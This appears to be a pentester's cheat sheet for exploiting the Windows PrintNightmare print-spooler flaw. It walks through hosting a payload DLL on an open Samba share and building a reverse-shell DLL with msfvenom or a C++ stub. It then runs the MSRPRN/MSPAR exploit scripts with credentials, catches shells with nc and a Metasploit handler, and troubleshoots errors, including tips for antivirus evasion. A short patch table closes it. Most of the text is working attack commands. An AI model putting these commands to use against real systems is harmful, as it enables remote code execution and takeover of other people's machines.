

A user account. (privs don’t mather)


RPC Dump

If you can reach these RPC interfaces you might be able to use printnightmare. @ip | egrep 'MS-RPRN|MS-PAR'


It Was All A Dream

git clone
cd ItWasAllADream && docker build -t itwasalladream .
docker run -it itwasalladream -u user -p password -d domain
docker cp <container-id>:/report_XXXXXXX ./

Setup tool for remote RCE (cube0x0)

Ensure you have a impacket version that has this PR merged.

mkdir printnightmare
cd printnightmare
mkdir payloads
git clone

Then if you are lazy just use the Taskfile included in the repo.

task payload_folder
task printnightmare_samba_share

To restore the smb.conf and stop the service run

task restore_samba

Otherwise use the steps below

Host Dll

Make a backup of your smb.conf

sudo cp /etc/samba/smb.conf etc/samba/smb.conf.bak

Overwite the file with the following content

    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

    comment = Samba
    path = /home/user/Documents/printnightmare/payloads/
    guest ok = yes
    read only = no
    browsable = yes
    force user = nobody

Ensure the files are owned by nobody

sudo chown nobody:user -R /home/user/Documents/printnightmare/payloads/
sudo chmod -R 777 /home/user/Documents/printnightmare/payloads/

Restart the smbd service

sudo service smbd restart

Don’t forget to restore the SMB config and disable the service :)

sudo cp /etc/samba/smb.conf etc/samba/smb.conf.bak
sudo service smbd stop

Outflanks implementation

Did not test this yet. But seems ‘better’ then the cube0x0 implementation

Create DLL

MSVenom if you think AV is not a problem. Otherwise build something custom.


msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<PORT TO LISTEN> -f dll -o /home/user/Documents/printnightmare/payloads/rev.dll

Custom simple C++ reverse shell example

  1. Install C++ tools in visual studio.

  2. Create new project with Dynamic-Link Libary template.

  3. Download the plain_revshell.cpp file and paste the content into the existing template.

  1. Update the RHOST & RPORT on StartCallback
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
	switch (dwReason) {
		StartCallback("", 80); // <- update this
  1. Build the release (ctrl+shift+b)

  2. Place the DLL in the payloads folder


python3 [MSPAR|MSRPRN|MSRPRN_nobrute].py 'domain/user:pass@ip' PrinterName '\\IP_of_SMB_share\share\printer.dll'

There are 3 different version. All versions have been updated to support a custom driver/printername.

Version Info When to use
MSPAR Abuses MSPAR When ItWasAllADream says its vulnerable
MSRPRN Abuses MSRPRN When ItWasAllADream says its vulnerable
MSRPRN_nobrute Abuses MSRPRN but does not brute force driver folders, see this pull When ItWasAllADream says its vulnerable but it does not seem to work and you tried everything listed in Errors & tips

Errors & tips

Error Solution
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied permissions on the file in the SMB share
RPRN SessionError: unknown error code: 0x180 Enable SMB2Support
RPRN SessionError: code: 0x2: - ERROR_FILE_NOT_FOUND - The system cannot fil the file specified. Typo in supplied DLL ?
RPRN SessionError: code: 0xd8 - ERROR_EXE_MACHINE_TYPE_MISMATCH DLL is kaduk or wrong architect (x86 vs x64)
RPRN SessionError: code 0xe1 - ERROR_VIRUS_INFECTED AV caught you butt, try harder
RPRN SessionError: Unknown error code: 0x8001011b Seems like the host is patched
RPRN SessionError: code: 0x43 ERROR_BAD_NET_NAME Wrong share name used in printnightmare or typo in samba config
SMB SessionError: STATUS_PIPE_BROKEN Print spooler service crashed during payload execution. Restart the spooler if you got a shell (PowerShell -> Restart-Service spooler. CMD -> net stop spooler && net start spooler)
After killing the session the payload does not work a second time Always ensure the first thing you do is restart the spooler service upon a shell connect. If you did this, use a different printername. Otherwise ur fuk’d
Sometimes when removing the print drivers the dll will execute again. This means your payload will run again. Nothing, just something to be aware of if you use a payload that adds a user or w.e.

Check if system reaches out

By simply trying to connect to a nc instance we can verify that the system can reach our smb server.

Start nc on 445.

sudo nv -nlvp 445

Run MSRPRN_nobrute and try to connect to nc.

python3 'user:pass@ip' PrinterName '\\IP_of_SMB_share\share\printer.dll'



Setup a listener

nc -nlvp 80
MSF multi handler
msfconsole -x "use exploit/multi/handler;\
set payload windows/shell_reverse_tcp;\
set LHOST;\
set LPORT 80;\
set ExitOnSession false;\
run -j"

Run printnightmare

python3 [MSPAR|MSRPRN|MSRPRN_nobrute].py  'domain/user:pass@ip' PrinterName '\\IP_of_SMB_share\share\printer.dll'
net stop spooler && net start spooler



Load PrintManagement PS Module (should be loaded by default on W10)
Import-Module PrintManagement
List current print drivers
Remove print drivers
Get-PrinterDriver -Name PrinterName

Watch out, Where-Object uses Wildcards to get both drivers that get installed (PrinterName0, PrinterName1). Also, make sure to update the dllname.dll in the Get-Item action.

Restart-Service Spooler;Import-Module PrintManagement;Get-PrinterDriver | Where-Object {$_.Name -like "*PrinterName*"} | Remove-PrinterDriver;Stop-Service spooler;Start-Sleep -s 2;Get-Item 'C:\windows\system32\spool\drivers\x64\3\New\','C:\windows\system32\spool\drivers\x64\3\Old\','C:\windows\system32\spool\drivers\x64\3\dllname.dll' -ErrorAction SilentlyContinue | Remove-Item;Start-Service spooler;Start-Sleep -s 2;Get-PrinterDriver


Method Fix
RCE MSRPRN Update Windows
RCE MSPAR Update Windows
LPE Not tested yet